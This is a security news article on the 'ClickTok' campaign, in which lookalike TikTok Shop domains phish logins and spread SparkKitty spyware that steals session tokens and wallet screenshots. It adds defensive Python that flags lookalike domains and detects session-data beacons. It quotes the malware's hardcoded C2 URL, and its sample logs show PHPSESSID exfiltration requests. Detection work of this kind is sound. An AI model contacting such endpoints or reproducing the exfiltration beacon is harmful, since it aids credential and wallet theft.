10,000+ Malicious TikTok Shop Domains Attacking Users to Steal Logins and Deploy Malware
A sophisticated cybercriminal campaign dubbed “ClickTok” has emerged as one of the most extensive threats targeting TikTok Shop users worldwide, with researchers identifying over 10,000 malicious domains designed to steal user credentials and deploy advanced spyware.
The campaign represents a significant escalation in e-commerce-focused cyberattacks, combining traditional phishing techniques with cutting-edge malware distribution to exploit the growing popularity of TikTok’s in-app shopping platform.
The threat actors behind ClickTok have developed a dual-pronged attack strategy that targets both regular shoppers and participants in TikTok’s affiliate program.
The campaign leverages deceptive replicas of legitimate TikTok Shop interfaces, tricking users into believing they are interacting with official platform features.
These fraudulent sites extend beyond simple TikTok Shop impersonation to include fake versions of TikTok Wholesale and TikTok Mall, creating a comprehensive ecosystem of malicious storefronts designed to maximize victim engagement.
CTM360 analysts identified the campaign in August 2025, revealing the sophisticated nature of the operation that exploits both the trust users place in TikTok’s brand and the financial incentives associated with affiliate marketing programs.
The researchers discovered that threat actors are distributing their malicious payload through over 5,000 distinct app download sites, using embedded download links and QR codes to facilitate widespread distribution of trojanized applications.
The attack methodology involves creating lookalike domains using low-cost top-level domains such as .top, .shop, and .icu, which serve dual purposes: hosting phishing pages for credential theft and distributing malicious applications.
These domains are often hosted on shared or free hosting services, making them both cost-effective for attackers and challenging for defenders to track comprehensively.
The campaign’s global reach extends far beyond the 17 countries where TikTok Shop is officially available, targeting users worldwide through AI-generated content and fake social media advertisements.
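The article describes the infrastructure pattern (brand name plus a storefront word such as shop, mall or wholesale, registered under low-cost TLDs like .top, .shop and .icu). Below is an added example, not code from CTM360 or from the article, of how a defender can score newly observed domains from a certificate-transparency or passive-DNS feed against that pattern. The domain list, the score weights, the homoglyph table and the first-party allowlist (`tiktok.com`) are all assumptions made for the illustration.

```python
# Constructed sample of newly observed domains, such as a certificate
# transparency or passive-DNS feed. These are illustrative, not article IOCs.
OBSERVED_DOMAINS = [
    "tiktok-shop-official.top",
    "tiktokmall-login.icu",
    "t1ktok-wholesale.shop",
    "tiktokshop.co.uk",
    "example-shop.top",
    "tiktok.com",
    "shop.tiktok.com",
]

BRAND_TOKENS = ("tiktok",)
STOREFRONT_WORDS = ("shop", "mall", "wholesale", "store")
LOW_COST_TLDS = {"top", "shop", "icu"}      # the TLDs the article names
FIRST_PARTY_SUFFIXES = ("tiktok.com",)      # assumed allowlist of real domains

# Digit-for-letter substitutions commonly used to dodge naive string matching.
HOMOGLYPHS = str.maketrans({"1": "i", "0": "o", "3": "e", "5": "s"})


def is_first_party(domain):
    # Suffix match on the full name: "tiktok.com.evil.top" does not pass.
    return any(domain == s or domain.endswith("." + s) for s in FIRST_PARTY_SUFFIXES)


def score_domain(domain):
    """Return a score and the reasons a domain looks like brand impersonation."""
    d = domain.lower().rstrip(".")
    if is_first_party(d):
        return {"domain": d, "score": 0, "reasons": ["first-party"]}
    labels = d.split(".")
    tld, body = labels[-1], ".".join(labels[:-1])
    norm = body.translate(HOMOGLYPHS)
    score, reasons = 0, []
    if any(b in norm for b in BRAND_TOKENS):
        score += 2
        reasons.append("brand-token")
        if not any(b in body for b in BRAND_TOKENS):
            score += 1                      # brand only visible after de-obfuscation
            reasons.append("homoglyph")
    if any(w in norm for w in STOREFRONT_WORDS):
        score += 1
        reasons.append("storefront-word")
    if tld in LOW_COST_TLDS:
        score += 1
        reasons.append("low-cost-tld")
    return {"domain": d, "score": score, "reasons": reasons}


def flag_lookalikes(domains, threshold=3):
    """Domains scoring at or above the threshold, highest first."""
    hits = [r for r in map(score_domain, domains) if r["score"] >= threshold]
    return sorted(hits, key=lambda r: -r["score"])


if __name__ == "__main__":
    for hit in flag_lookalikes(OBSERVED_DOMAINS):
        print(hit["score"], hit["domain"], ", ".join(hit["reasons"]))
```

The TLD is treated as one signal among several rather than a requirement, so a lookalike on a conventional TLD still scores on the brand and storefront tokens; the threshold is the knob to tune against a real feed's noise level.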
Technical Infrastructure and Command & Control Operations
The malicious applications distributed through this campaign deploy a variant of the SparkKitty spyware, which establishes persistent communication with attacker-controlled infrastructure.
Decompilation of the malware reveals hardcoded command and control servers, with the primary endpoint being statically embedded in the application’s source code:
URL url = new URL("https://aa.6786587.top/?dev=az");
This hardcoded approach suggests either an immature threat actor or early-stage development, as more sophisticated malware typically employs dynamic C2 rotation techniques.
The malware initiates communication by sending POST and GET requests containing harvested data including TikTok user IDs and session tokens (PHPSESSID).
The C2 server responds with Base64-encoded payloads containing dynamic configurations, campaign identifiers, and command instructions tailored to specific infections.
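Two of the observations above are directly usable for detection: a C2 endpoint embedded as a string literal in the app, and beacons that carry the victim's TikTok user ID and PHPSESSID to a third-party host. The example below is added here and is not the researchers' tooling. It pulls URL literals out of a decompiled source snippet (the one URL literal is the endpoint quoted in the article; the surrounding Java is constructed) and then triages constructed proxy log lines, flagging traffic to any hardcoded host and any request that sends session data to a host outside an assumed first-party allowlist. The log format, the parameter names `uid` and `PHPSESSID` as they appear in the body, and the hosts in the log other than the article's are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed stand-in for decompiled Java from the trojanized app. The URL
# literal is the endpoint quoted in the article; the rest is illustrative.
DECOMPILED_SOURCE = '''
public class Beacon {
    void run() throws Exception {
        URL url = new URL("https://aa.6786587.top/?dev=az");
    }
}
'''

# Constructed proxy log lines in a hypothetical "METHOD URL BODY" format
# ("-" when there is no body). This is not captured traffic.
PROXY_LOG = [
    "POST https://aa.6786587.top/?dev=az uid=1234567&PHPSESSID=abc123",
    "GET https://www.tiktok.com/api/feed?sessionid=keep -",
    "GET https://cdn.example.test/app.js -",
    "POST https://login.tiktok-mall.icu/verify PHPSESSID=def456&user=victim",
]

URL_LITERAL = re.compile(r'"(https?://[^"\s]+)"')
SESSION_KEYS = {"phpsessid", "uid", "user_id"}   # assumed parameter names
TRUSTED_SUFFIXES = ("tiktok.com",)               # assumed first-party allowlist


def extract_hardcoded_hosts(source):
    """Pull every URL string literal out of decompiled source and return its host."""
    hosts = set()
    for url in URL_LITERAL.findall(source):
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def is_first_party(host):
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def _param_names(url, body):
    """Lower-cased parameter names from the query string and the form body."""
    names = set(parse_qs(urlparse(url).query))
    if body and body != "-":
        names |= set(parse_qs(body))
    return {n.lower() for n in names}


def triage(log_lines, hardcoded_hosts):
    """Flag requests to hardcoded endpoints or leaking session data off-platform."""
    findings = []
    for line in log_lines:
        method, url, body = line.split(" ", 2)
        host = (urlparse(url).hostname or "").lower()
        reasons = []
        if host in hardcoded_hosts:
            reasons.append("hardcoded-endpoint")
        leaked = _param_names(url, body) & SESSION_KEYS
        if leaked and not is_first_party(host):
            reasons.append("session-data-to-third-party:" + ",".join(sorted(leaked)))
        if reasons:
            findings.append({"host": host, "method": method, "reasons": reasons})
    return findings


if __name__ == "__main__":
    c2_hosts = extract_hardcoded_hosts(DECOMPILED_SOURCE)
    for finding in triage(PROXY_LOG, c2_hosts):
        print(finding["method"], finding["host"], "; ".join(finding["reasons"]))
```

The second rule is the more durable one: it does not depend on knowing the C2 host in advance, which matters once an operator moves away from the static endpoint the article notes and starts rotating infrastructure.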
The spyware’s primary capabilities focus on data exfiltration, particularly targeting cryptocurrency-related information stored on infected devices.
The malware systematically scrapes device galleries for screenshots that may contain seed phrases or wallet information, while simultaneously conducting comprehensive device fingerprinting to collect operating system details, device identifiers, and location data for transmission back to the attackers’ servers.